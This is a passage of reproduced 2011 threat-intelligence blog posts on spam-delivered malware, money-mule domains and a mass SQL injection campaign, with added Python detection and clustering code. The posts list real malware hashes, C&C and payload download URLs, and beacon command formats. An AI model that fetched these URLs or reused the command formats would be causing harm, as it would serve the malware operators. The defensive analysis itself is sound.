
NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru

NS2.MNAMEDL.SU - 46.4.148.118

NS3.MNAMEDL.SU - 184.82.158.75

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru

NS2.MLDNS.SU - 46.4.148.74

NS3.MLDNS.SU - 184.82.158.74

NS1.NAMESUKNS.CC - Email: pal@bz3.ru

NS2.NAMESUKNS.CC

NS3.NAMESUKNS.CC

NS1.NAMEUK.AT - Email: admin@nameuk.at

NS2.NAMEUK.AT

NS3.NAMEUK.AT

NS1.UKDNSTART.NET - Email: admin@ukdnstart.net

NS2.UKDNSTART.NET

NS3.UKDNSTART.NET
Monitoring of the money mule recruitment campaigns is ongoing.
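
The lists above only become intelligence once they are pivoted: which domains share a responding IP, a registrant address, or a throwaway mail provider. The following is an added example in Python (my code, not part of the original brief) that parses lines in the brief's own "DOMAIN - IP - Email: address" layout and clusters them with a union-find over shared IPs and registrant e-mails. The embedded sample is a constructed subset of the entries listed above; the mail-provider report reflects my assumption that a disposable provider reused across registrations is worth flagging, not a claim the brief makes.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

Record = Tuple[str, Optional[str], Optional[str]]  # (domain, ip, registrant email)

# Constructed sample input: a subset of the "DOMAIN - IP - Email: address"
# lines from the brief above, copied in the same layout (IP and e-mail are
# both optional, exactly as in the brief).
SAMPLE = """\
ACWOODE-GROUP.COM - 78.46.105.205 - Email: admin@acwoode-group.com
CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net
CONDORLLC-UK.COM - Email: plods@fxmail.net
DE-DVFGROUP.BE
fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org
fine-artgroup.com - 209.190.4.91
gmd-contracting.com - 194.242.2.56 - Email: admin@gmd-contracting.com
ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com
NARTEN-ART.COM - 78.46.105.205 - Email: glamor@fxmail.net
techce-group.com - 184.168.64.173 - Email: admin@techce-group.com
TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex-group.net
triad-webs.com - 85.17.24.226
"""

LINE_RE = re.compile(
    r"^(?P<domain>[A-Za-z0-9][A-Za-z0-9.-]*)"
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"
    r"(?:\s*-\s*Email:\s*(?P<email>[^\s@]+@[^\s@]+))?\s*$"
)


def parse(text: str) -> List[Record]:
    """Parse the brief's line format; domains and e-mails are lower-cased
    so that ACWOODE-GROUP.COM and acwoode-group.com pivot together."""
    records: List[Record] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable line: {line!r}")
        email = m["email"].lower() if m["email"] else None
        records.append((m["domain"].lower(), m["ip"], email))
    return records


def cluster(records: List[Record]) -> List[Set[str]]:
    """Union-find over domains: two domains join one cluster when they share
    a responding IP or a registrant e-mail (directly or transitively)."""
    parent: Dict[str, str] = {}

    def find(x: str) -> str:
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        parent[find(a)] = find(b)

    for domain, ip, email in records:
        find(domain)  # register the domain even if it pivots to nothing
        if ip:
            union(domain, "ip:" + ip)
        if email:
            union(domain, "email:" + email)
    groups: Dict[str, Set[str]] = defaultdict(set)
    for domain, _, _ in records:
        groups[find(domain)].add(domain)
    # largest clusters first, then alphabetical, for a stable report
    return sorted(groups.values(), key=lambda s: (-len(s), sorted(s)))


def ip_hubs(records: List[Record]) -> List[Tuple[str, int]]:
    """Responding IPs ranked by how many campaign domains sit on them."""
    counts: Dict[str, int] = defaultdict(int)
    for _, ip, _ in records:
        if ip:
            counts[ip] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def shared_mail_providers(records: List[Record]) -> Dict[str, List[str]]:
    """Registrant mail providers reused across more than one domain. The
    admin@<own-domain> pattern links nothing; a throwaway provider reused
    across registrations is the weak-but-useful signal (my assumption)."""
    by_provider: Dict[str, List[str]] = defaultdict(list)
    for domain, _, email in records:
        if email:
            by_provider[email.split("@", 1)[1]].append(domain)
    return {p: sorted(d) for p, d in by_provider.items() if len(d) > 1}


if __name__ == "__main__":
    recs = parse(SAMPLE)
    for group in cluster(recs):
        print(len(group), sorted(group))
    print(ip_hubs(recs))
    print(shared_mail_providers(recs))
```

Feeding the complete list from the brief instead of the sample collapses most of it into one cluster on 78.46.105.205, with a second, smaller cluster on 209.190.4.91; the singletons are the entries that need a second pivot (name server or registrar) before they can be tied to the rest.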

Related posts: 
17. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

18. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

19. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

20. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

21. http://ddanchev.blogspot.com/
Summarizing 3 Years of Research Into Cyber Jihad (2011-09-11 13:34)

On this very special day, I'd like to honor the fallen by summarizing my research into cyber jihad, a topic I'm still highly passionate about. Enjoy and share it with your social circle!

1. [1]Tracking Down Internet Terrorist Propaganda

2. [2]Arabic Extremist Group Forum Messages' Characteristics

3. [3]Cyber Terrorism Communications and Propaganda

4. [4]A Cost-Benefit Analysis of Cyber Terrorism

5. [5]Current State of Internet Jihad

6. [6]Analysis of the Technical Mujahid - Issue One

7. [7]Full List of Hezbollah's Internet Sites

8. [8]Steganography and Cyber Terrorism Communications

9. [9]Hezbollah's DNS Service Providers from 1998 to 2006

10. [10]Mujahideen Secrets Encryption Tool

11. [11]Analyses of Cyber Jihadist Forums and Blogs

12. [12]Cyber Traps for Wannabe Jihadists

13. [13]Inshallahshaheed - Come Out, Come Out Wherever You Are

14. [14]GIMF Switching Blogs

15. [15]GIMF Now Permanently Shut Down

16. [16]GIMF - "We Will Remain"

17. [17]Wisdom of the Anti Cyber Jihadist Crowd

18. [18]Cyber Jihadist Blogs Switching Locations Again

19. [19]Electronic Jihad v3.0 - What Cyber Jihad isn't

20. [20]Electronic Jihad's Targets List

21. [21]Teaching Cyber Jihadists How to Hack

22. [22]A Botnet of Infected Terrorists?

23. [23]Infecting Terrorist Suspects with Malware

24. [24]The Dark Web and Cyber Jihad

25. [25]Cyber Jihadist Hacking Teams

26. [26]Two Cyber Jihadist Blogs Now Offline

27. [27]Characteristics of Islamist Websites

28. [28]Cyber Traps for Wannabe Jihadists

29. [29]Mujahideen Secrets Encryption Tool

30. [30]An Analysis of the Technical Mujahid - Issue Two

31. [31]Terrorist Groups' Brand Identities

32. [32]A List of Terrorists' Blogs

33. [33]Jihadists' Anonymous Internet Surfing Preferences

34. [34]Sampling Jihadists' IPs

35. [35]Cyber Jihadists and TOR

36. [36]A Cyber Jihadist DoS Tool

37. [37]GIMF Now Permanently Shut Down

38. [38]Mujahideen Secrets 2 Encryption Tool Released

39. [39]Terror on the Internet - Conflict of Interest

This post has been reproduced from [40]Dancho Danchev's blog. Follow him [41]on Twitter.

1. http://ddanchev.blogspot.com/2006/06/tracking-down-internet-terrorist.html

2. http://ddanchev.blogspot.com/2006/05/arabic-extremist-group-forum-messages.html

3. http://ddanchev.blogspot.com/2006/08/cyber-terrorism-communications-and_22.html

4. http://ddanchev.blogspot.com/2006/10/cost-benefit-analysis-of-cyber.html

5. http://ddanchev.blogspot.com/2006/12/current-state-of-internet-jihad.html

6. http://ddanchev.blogspot.com/2006/12/analysis-of-technical-mujahid-issue-one.html

7. http://ddanchev.blogspot.com/2006/12/full-list-of-hezbollahs-internet-sites.html

8. http://ddanchev.blogspot.com/2006/08/steganography-and-cyber-terrorism.html

9. http://ddanchev.blogspot.com/2006/09/hezbollahs-dns-service-providers-from.html

10. http://ddanchev.blogspot.com/2007/04/mujahideen-secrets-encryption-tool.html

11. http://ddanchev.blogspot.com/2007/08/analyses-of-cyber-jihadist-forums-and.html

12. http://ddanchev.blogspot.com/2007/03/cyber-traps-for-wannabe-jihadists.html

13. http://ddanchev.blogspot.com/2007/12/inshallahshaheed-come-out-come-out.html

14. http://ddanchev.blogspot.com/2007/07/gimf-switching-blogs.html

15. http://ddanchev.blogspot.com/2007/08/gimf-now-permanently-shut-down.html

16. http://ddanchev.blogspot.com/2007/08/gimf-we-will-remain.html

17. http://ddanchev.blogspot.com/2007/10/wisdom-of-anti-cyber-jihadist-crowd.html

18. http://ddanchev.blogspot.com/2007/11/cyber-jihadist-blogs-switching.html

19. http://ddanchev.blogspot.com/2007/11/electronic-jihad-v30-what-cyber-jihad.html

20. http://ddanchev.blogspot.com/2007/11/electronic-jihads-targets-list.html

21. http://ddanchev.blogspot.com/2007/11/teaching-cyber-jihadists-how-to-hack.html

22. http://ddanchev.blogspot.com/2007/11/botnet-of-infected-terrorists.html

23. http://ddanchev.blogspot.com/2007/09/infecting-terrorist-suspects-with.html

24. http://ddanchev.blogspot.com/2007/09/dark-web-and-cyber-jihad.html

25. http://ddanchev.blogspot.com/2007/12/cyber-jihadist-hacking-teams.html

26. http://ddanchev.blogspot.com/2007/09/two-cyber-jihadist-blogs-now-offline.html

27. http://ddanchev.blogspot.com/2007/02/characteristics-of-islamist-websites.html

28. http://ddanchev.blogspot.com/2007/03/cyber-traps-for-wannabe-jihadists.html

29. http://ddanchev.blogspot.com/2007/04/mujahideen-secrets-encryption-tool.html

30. http://ddanchev.blogspot.com/2007/06/analysis-of-technical-mujahid-issue-two.html

31. http://ddanchev.blogspot.com/2007/07/terrorist-groups-brand-identities.html

32. http://ddanchev.blogspot.com/2007/06/list-of-terrorists-blogs.html

33. http://ddanchev.blogspot.com/2007/05/jihadists-anonymous-internet-surfing.html

34. http://ddanchev.blogspot.com/2007/05/sampling-jihadists-ips.html

35. http://ddanchev.blogspot.com/2007/07/cyber-jihadists-and-tor.html

36. http://ddanchev.blogspot.com/2007/08/cyber-jihadist-dos-tool.html

37. http://ddanchev.blogspot.com/2007/08/gimf-now-permanently-shut-down.html

38. http://ddanchev.blogspot.com/2008/01/mujahideen-secrets-2-encryption-tool.html

39. http://ddanchev.blogspot.com/2008/03/terror-on-internet-conflict-of-interest.html

40. http://ddanchev.blogspot.com/

41. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for August (2011-09-27 19:13)

The following is a brief summary of all of my posts at ZDNet's Zero Day for August. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]Study: Rootkits target pirated copies of Windows XP

02. [4]56 percent of enterprise users using vulnerable Adobe Reader plugins

03. [5]New malware attack circulating on Facebook

04. [6]Kaspersky: 12 different vulnerabilities detected on every PC

05. [7]Spamvertised Uniform traffic tickets and invoices lead to malware

06. [8]Latest version of Skype susceptible to malicious code injection flaw

07. [9]Spamvertised 'Scan from a Xerox WorkCentre Pro' leads to malware

08. [10]Malware Watch: FDIC and Western Union themed emails lead to malware

This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/study-rootkits-target-pirated-copies-of-windows-xp/9223

4. http://www.zdnet.com/blog/security/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/9241

5. http://www.zdnet.com/blog/security/new-malware-attack-circulating-on-facebook/9281

6. http://www.zdnet.com/blog/security/kaspersky-12-different-vulnerabilities-detected-on-every-pc/9283

7. http://www.zdnet.com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289

8. http://www.zdnet.com/blog/security/latest-version-of-skype-susceptible-to-malicious-code-injection-flaw/9295

9. http://www.zdnet.com/blog/security/spamvertised-scan-from-a-xerox-workcentre-pro-leads-to-malware/9315

10. http://www.zdnet.com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/9328

11. http://ddanchev.blogspot.com/

12. http://twitter.com/danchodanchev
Spamvertised 'Uniform Traffic Ticket' and 'FDIC Notifications' Serving Malware - Historical OSINT (2011-09-28 14:43)

The following intelligence brief will summarize the findings from a brief analysis performed on two malware campaigns from August, namely, the [1]spamvertised Uniform Traffic Tickets and the [2]FDIC Notification.

Uniform Traffic Tickets

Spamvertised attachments: Ticket-728-2011.zip; Ticket-064-211.zip; Ticket-728-2011.zip

Detection rates:

Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@aK9ebrii - Detection rate: 37/43 (86.0 %)
MD5: 6361d4a40485345c18473f3c6b4b6609
SHA1: 50b09bb2e0044aa139a84c2e445a56f01d70c185
SHA256: ca67a14bfed2a7bc2ac8be9c01cb17d5da12b75320b4bad4fe8d8a6759ad9725

Ticket1.exe - [4]Trojan-Downloader.Win32.Small.ccxz - Detection rate: 36/44 (81.8 %)
MD5: e2a2d67b8a52ae655f92779bec296676
SHA1: ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf
SHA256: 50b104c5f8314327e03b01e7f7c2535d8de7cd9f73f8e16d1364c7fd021a90cc

Upon execution the samples phone back to:

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to the same IP is also survey-providers.info) - AS51630 - Email: admin@sdkjgndfjnf.ru

rattsillis.com/ftp/g.php - 195.189.226.109; 178.208.77.247; 195.189.226.107; 195.189.226.108 - AS41018 - Email: admin@jokelimo.com

rattsillis.com/pusk3.exe - 195.189.226.109; 178.208.77.247; 195.189.226.107; 195.189.226.108 - AS41018 - Email: admin@jokelimo.com

DNS emulation of ns1.lemanbrostm.info reveals two domains using the same name server: belidiskalom.com - 178.208.76.175 - Email: admin@belidiskalom.com, and lemanbrostm.info - Email: coz@yahoo.com.

Known MD5 modifications for pusk3.exe at rattsillis.com:

c6dab856705b5dfd09b2adbe10701b05
f167213c6a79f2313995e80a8ac29939
f4764cce5c3795b1d63a299a5329d2e2
dae9e7653573478a6b41a62f7cb99c12
69c983c9dfaf37e346004c9aaf54a3d0
d875b8e32a231405c7fa96b810e9b361
628270c6e44b0fa21ef8e87c6bc36f57
9b69dabd876e967bcd2eb85465175e3b
0434c084dba8626df980c7974d5728e1

Related binaries and associated MD5 modifications:

rattsillis.com/blood.exe - MD5: 23795cb9b2f5e19eff0df0cf2fba9247; 82b6f18b130a1f0ce1ce928d0980fab0

rattsillis.com/pusk.exe - MD5: 55d8e25bc373a98c5c29284c989953ab; 368c86556e827d898f043a4d5f378fa0; 7411d0d29db91f2625ee36d438eb6ac4; 3ea4e9fd297b3058ebbb360c1581aaac

rattsillis.com/pusk2.exe - MD5: dae9e7653573478a6b41a62f7cb99c12; b73705c097c9be9779730d801ad098e0; d7952c1e77d7bb250cdfa88e157fb5a8

Known MD5 modifications for pusk3.exe at sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf

sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8; ebf7278a7239378e7d70d426779962ce

sdkjgndfjnf.ru/pusk2.exe - MD5: d9e36e25a3181f574fd5d520cb501d3a

sdkjgndfjnf.ru/pusk.exe - MD5: fce04f7681283207d585561ed91e77b4

Detection rate for blood.exe:

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %)
MD5: 577cf0b7ca3d5bcbe35764024f241fa8
SHA1: 30f542a44d06d9125cdfbdd38d79de778e4c0791
SHA256: 1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18

FDIC Notification

Spamvertised attachments: FDIC_Document.zip

Detection rate:

FDIC_Document.exe - Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %)
MD5: 7b5a271c58c6bb18d79cd48353127ff6
SHA1: 6526b6097df42f93bee25d7ea73f95d2fcc24d3a
SHA256: a09165c71a8dd2a1338b2bd0c92ae07495041ae15592e3432bd50600e6ef2af0

Upon execution phones back to:

rattsillis.com/ftp/g.php

rattsillis.com/blood.exe - MD5: 23795cb9b2f5e19eff0df0cf2fba9247; 82b6f18b130a1f0ce1ce928d0980fab0

What's particularly interesting is the fact that both campaigns have been launched by the same cybercriminal, with the same C&C, rattsillis.com, also seen in the [6]spamvertised ACH Payment Canceled campaign.

This post has been reproduced from [7]Dancho Danchev's blog. Follow him [8]on Twitter.

1. http://www.zdnet.com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289

2. http://www.zdnet.com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/9328

3. http://www.virustotal.com/file-scan/report.html?id=ca67a14bfed2a7bc2ac8be9c01cb17d5da12b75320b4bad4fe8d8a6759ad9725-1315139717

4. http://www.virustotal.com/file-scan/report.html?id=50b104c5f8314327e03b01e7f7c2535d8de7cd9f73f8e16d1364c7fd021a90cc-1315139775

5. http://www.virustotal.com/file-scan/report.html?id=1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18-1315161281

6. http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/

7. http://ddanchev.blogspot.com/

8. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for September (2011-10-04 14:37)

The following is a brief summary of all of my posts at ZDNet's Zero Day for September. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]Spamvertised 'Facebook notification' leads to exploits and malware

02. [4]Google, Mozilla and Microsoft ban the DigiNotar Certificate Authority in their browsers

03. [5]Microsoft themed ransomware variant spotted in the wild

04. [6]'Man in wheelchair falls down the elevator shaft' scam spreading on Facebook

05. [7]New ransomware variant uses false child porn accusations

06. [8]Russian Embassy in London hit by a DDoS attack

07. [9]uTorrent.com hacked, serving scareware

08. [10]Bank of Melbourne Twitter account hacked, spreading phishing links

09. [11]Malicious spam campaigns proliferating

10. [12]Spamvertised 'We are going to sue you' emails lead to malware

11. [13]XSS bug in Skype for iPhone, iPad allows address book theft

12. [14]Researcher releases details on 6 SCADA vulnerabilities

13. [15]DIY botnet kit spotted in the wild

14. [16]New Mac OS X trojan poses as malicious PDF file

15. [17]Survey: 60 percent of users use the same password across more than one of their online accounts

This post has been reproduced from [18]Dancho Danchev's blog. Follow him [19]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/spamvertised-facebook-notification-leads-to-exploits-and-malware/9334

4. http://www.zdnet.com/blog/security/google-mozilla-and-microsoft-ban-the-diginotar-certificate-authority-in-their-browsers/9337

5. http://www.zdnet.com/blog/security/microsoft-themed-ransomware-variant-spotted-in-the-wild/9341

6. http://www.zdnet.com/blog/security/man-in-wheelchair-falls-down-the-elevator-shaft-scam-spreading-on-facebook/9403

7. http://www.zdnet.com/blog/security/new-ransomware-variant-uses-false-child-porn-accusations-/9406

8. http://www.zdnet.com/blog/security/russian-embassy-in-london-hit-by-a-ddos-attack/9409

9. http://www.zdnet.com/blog/security/utorrentcom-hacked-serving-scareware/9413

10. http://www.zdnet.com/blog/security/bank-of-melbourne-twitter-account-hacked-spreading-phishing-links/9415

11. http://www.zdnet.com/blog/security/malicious-spam-campaigns-proliferating/9420

12. http://www.zdnet.com/blog/security/spamvertised-we-are-going-to-sue-you-emails-lead-to-malware/9423

13. http://www.zdnet.com/blog/security/xss-bug-in-skype-for-iphone-ipad-allows-address-book-theft/9426

14. http://www.zdnet.com/blog/security/researcher-releases-details-on-6-scada-vulnerabilities/9432

15. http://www.zdnet.com/blog/security/diy-botnet-kit-spotted-in-the-wild/9440

16. http://www.zdnet.com/blog/security/new-mac-os-x-trojan-poses-as-malicious-pdf-file/9486

17. http://www.zdnet.com/blog/security/survey-60-percent-of-users-use-the-same-password-across-more-than-one-of-their-online-accounts/9489

18. http://ddanchev.blogspot.com/

19. http://twitter.com/danchodanchev
Spamvertised "NACHA security nitification" Serving Malware - Historical OSINT (2011-10-04 14:38)

The following intelligence brief will offer historical OSINT on the "NACHA security nitification" malware campaign. The typo is intentionally left as is, since this is how the original campaign was spamvertised.

Spamvertised body:

Dear Valued Client, We strongly believe that your account may have been compromised. Due to this, we cancelled the last ACH transactions: - (ID: 13104924) - (ID: 04804768) - (ID: 37527025) - (ID: 51633547) initiated from your bank account by you or any other person, who might have access to your account. Detailed report on initiated transactions and reasons for cancellation can be found in the attachment.

The ACH transaction (ID: 83612541), recently sent from your bank account (by you or any other person), was rejected by the Electronic Payments Association.

###############################################

Canceled transaction

Transaction ID: 83612541

Reason of rejection See details in the report below

Transaction Report report_1409.pdf.zip (ZIP archive, Adobe PDF)

###############################################

13450 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 (703) 561-1100

2011 NACHA - The Electronic Payments Association

Spamvertised attachments: report_1409.pdf.zip; Report-8764.zip

Detection rate:

Report-8764.exe - [1]Gen:Trojan.Heur.FU.bqW@amtJU@oi - 39/43 (90.7 %)
MD5: 7c131fa05e01fc32d8f4efe53aa883d1
SHA1: 14d52d76dd7ccc595554486027634bf8c9877036
SHA256: 1ad11c1193f0dbcae3766e5cb4094acc137c10430d615e55470cbc41ce6cd03a

Upon execution the sample phones back to:

onemoretimehi.ru/piety.exe - 188.65.208.59; 178.208.91.192 - Email: admin@onemoretimehi.ru

onemoretimehi.ru/ftp/g.php

piety.exe - MD5: 4bd87ecc4423f0bc15e229ecbf33aa2c

onemoretimehi.ru/tops.exe - MD5: f076dbc365ec7bfc438ad3c728702122; 86c7489ac539a0b57a4d075e723075f0

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=1ad11c1193f0dbcae3766e5cb4094acc137c10430d615e55470cbc41ce6cd03a-1317676852

2. http://ddanchev.blogspot.com/

3. http://twitter.com/danchodanchev
Spamvertised "IRS notice" Serving Malware (2011-10-09 19:53)

Cybercriminals are spamvertising yet another malware-serving campaign. Impersonating the IRS, malicious attackers are attempting to entice end users into downloading and executing a malicious file attachment.

Spamvertised message: Tax notice, There are arrears reckoned on your account over a period of 2010-2011 year You will find all calculations according to your financial debt, enclosed. Sincerely, Internal Revenue Service

Detection rate:

Calculations.exe - [1]TrojanDownloader:Win32/Dofoil.D - 33/43 (76.7 %)
MD5: 178bb562d9c0ef2b0a87467dcbd945ee
SHA1: 9ef75146aeb27102a1e5662284f369a43144225c
SHA256: d1551934d60033c871b377015c8be65d608b33543f149369d1e70361e06dc05e

Upon execution, it phones back to:

falcononfly2006.ru/blog/task.php?bid=2bfc680038ba2be7&os=5-1-2600&uptime=0&rnd=150156

falcononfly2006.ru - 91.229.90.139, AS6753 - Email: makrogerhouse@yandex.ru

makrogerhouse@yandex.ru is also associated with the following domains:

diamondexchange2011.ru

philippinemoney2011.ru

Bedownloader2011.ru

dolcekomarenoro2011.ru

forsalga102.ru

runescapegpge2011.ru

yomwarayom2001.ru

moneymgmt2011.ru

moneykeep2011.ru

firewallmakeover.ru

czechmoney2011.ru

communityspace2911.ru

brazilianmoney2011.ru

Monitoring of the campaign is ongoing.

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=d1551934d60033c871b377015c8be65d608b33543f149369d1e70361e06dc05e-1318162358

2. http://ddanchev.blogspot.com/

3. http://twitter.com/danchodanchev
Spamvertised IRS-themed "Last Notice" Emails Serving Malware (2011-10-18 21:45)

Cybercriminals are once again impersonating the Internal Revenue Service (IRS) for malware-serving purposes. In this intelligence brief, we'll dissect the malware campaign.

Spamvertised attachment: IRS_Calculations_#ID6749.zip

Spamvertised message: Notice, There are arrears reckoned on your account over a period of 2010-2011 year. You will find all calculations according to your financial debt, enclosed. You have to pay out the debt by the 17 December 2011. Yours sincerely, IRS.

Detection rate:

IRS_Calculations.exe - [1]W32/Yakes.B!tr - 34/40 (85.0 %)
MD5: e44eb03582f030d30251e6be384f6b32
SHA1: eaa3d76534d247d04987b8950965d0142d770b29
SHA256: 18386f49580298eee73688ce5e626a9e332886c25403a991495e0a3250c53e32
Upon execution phones back to:

bitgale.com/404.php?type=stats&affid=574&subid=01&iruns - 31.44.184.42; AS15884 - Email: davidsiddins@gxmailbox.com

shbsharri.com/arkivi_files/574-01.exe - returns "Bandwidth Limit Exceeded" - 74.55.50.202; AS21844 - Email: contact@privacyprotect.org

shbsharri.com/arkivi_files/setup.exe - returns "Bandwidth Limit Exceeded"

shbsharri.com/arkivi_files/sll6.exe - returns "Bandwidth Limit Exceeded"

shbsharri.com/arkivi_files/sssss.exe - returns "Bandwidth Limit Exceeded"

gansgansgroup.ru/true/index.php?cmd=getgrab - Connect to 91.229.90.139 on port 80 ... failed

gansgansgroup.ru/true/index.php?cmd=getproxy - Connect to 91.229.90.139 on port 80 ... failed

gansgansgroup.ru/true/index.php?cmd=getload&login=4117AF14E694E469C&sel=donat&ver=5.1&bits=0&file=1&run=ok

gansgansgroup.ru/true/index.php?cmd=getsocks&login=4117AF14E694E469C&port=11925

gansgansgroup.ru - 91.229.90.139; AS6753 (responding to 91.229.90.139 is also falcononfly2006.ru - Email: makrogerhouse@yandex.ru) - Email: gansgansgroup.ru@allperson.ru
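The beacon URLs above share one shape (index.php with a cmd verb, a hex login token and, for getsocks, a port), which is enough for proxy-log detection. As an added example that is not part of the original post, the following Python classifies such requests in a constructed proxy log; the host name, client IPs and login token are placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Beacon shape seen in this post: .../index.php?cmd=<verb>&login=<hex id>[&port=N]
BEACON_CMDS = {"getgrab", "getproxy", "getload", "getsocks"}
LOGIN_RE = re.compile(r"^[0-9A-F]{8,}$", re.I)

# Constructed proxy log ("timestamp client method url"): two benign requests and
# three modelled on the beacon URLs above. Host, clients and login are placeholders.
SAMPLE_LOG = """\
1318962605.101 10.0.0.5 GET http://www.example.test/index.php?cmd=search&q=tax
1318962606.220 10.0.0.7 GET http://c2.invalid/true/index.php?cmd=getgrab
1318962607.455 10.0.0.7 GET http://c2.invalid/true/index.php?cmd=getload&login=0123456789ABCDEF0&sel=donat&ver=5.1&bits=0&file=1&run=ok
1318962608.001 10.0.0.9 GET http://cdn.example.test/lib.js?ver=5.1
1318962609.310 10.0.0.7 GET http://c2.invalid/true/index.php?cmd=getsocks&login=0123456789ABCDEF0&port=11925
"""


def classify_url(url):
    """Describe the request as a beacon (dict) or return None if it is not one."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    cmd = query.get("cmd", [""])[0].lower()
    if cmd not in BEACON_CMDS or not parts.path.endswith("index.php"):
        return None
    login = query.get("login", [""])[0]
    info = {"host": parts.hostname, "cmd": cmd,
            "login": login if LOGIN_RE.match(login) else None}
    if cmd == "getsocks" and "port" in query:
        info["port"] = int(query["port"][0])  # the SOCKS back-connect port
    return info


def scan_log(text):
    """Return one finding per beacon-shaped request, in log order."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        timestamp, client, _method, url = fields[:4]
        beacon = classify_url(url)
        if beacon:
            hits.append({"ts": timestamp, "client": client, **beacon})
    return hits


def infected_clients(hits):
    """Client -> set of beacon verbs seen, a quick triage view."""
    by_client = {}
    for hit in hits:
        by_client.setdefault(hit["client"], set()).add(hit["cmd"])
    return by_client


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(infected_clients(scan_log(SAMPLE_LOG)))
```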

The same email, makrogerhouse@yandex.ru, has been linked to a [2]previously spamvertised IRS-themed malware campaign.

Clearly, both campaigns have been launched by the same cybercriminal.

This post has been reproduced from [3]Dancho Danchev's blog. Follow him [4]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=18386f49580298eee73688ce5e626a9e332886c25403a991495e0a3250c53e32-1318962605

2. http://ddanchev.blogspot.com/2011/10/spamvertised-irs-notice-serving-malware.html

3. http://ddanchev.blogspot.com/

4. http://twitter.com/danchodanchev
Dissecting the Ongoing Mass SQL Injection Attack (2011-10-20 23:36)

The [1]ongoing mass SQL injection attack has already affected over a [2]million web sites. Cybercriminals performing [3]active search engine [4]reconnaissance have managed to inject a malicious script into ASP/ASP.NET websites.

From [5]client-side exploits to bogus Adobe Flash players, the campaign is active and ongoing. In this intelligence brief, we'll dissect the campaign and establish a direct connection between it and last March's [6]Lizamoon mass SQL injection attack.
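A site owner cleaning up after such an injection needs to find every stored text value that now carries a foreign script tag. As an added example that is not part of the original post, the following Python scans constructed database rows for external <script src=...> references (here pointing at the urchin.js hosts named in this post) and strips them; the first-party allowlist is hypothetical.

```python
import re
from urllib.parse import urlparse

# <script ... src=URL> with an absolute or protocol-relative URL; quotes are
# optional, since injected tags are often written without them.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?\s*((?:https?:)?//[^\"'\s>]+)", re.I)
SCRIPT_EL_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)

# Hypothetical first-party hosts that content is allowed to reference.
FIRST_PARTY = {"www.example.test", "cdn.example.test"}

# Constructed rows standing in for text columns of a site's database; rows 2
# and 4 carry tags pointing at the urchin.js hosts named in this post.
SAMPLE_ROWS = [
    (1, "Welcome to our store"),
    (2, "Product X<script src=http://jjghui.com/urchin.js></script>"),
    (3, '<p>Q3 report</p><script src="//cdn.example.test/app.js"></script>'),
    (4, "Contact us<script src='HTTP://nbnjkl.com/urchin.js'></script>"),
]


def injected_hosts(text, first_party=FIRST_PARTY):
    """Hosts of external script tags found in `text`, in document order."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(text):
        url = "http:" + src if src.startswith("//") else src
        host = (urlparse(url).hostname or "").lower()
        if host and host not in first_party:
            hosts.append(host)
    return hosts


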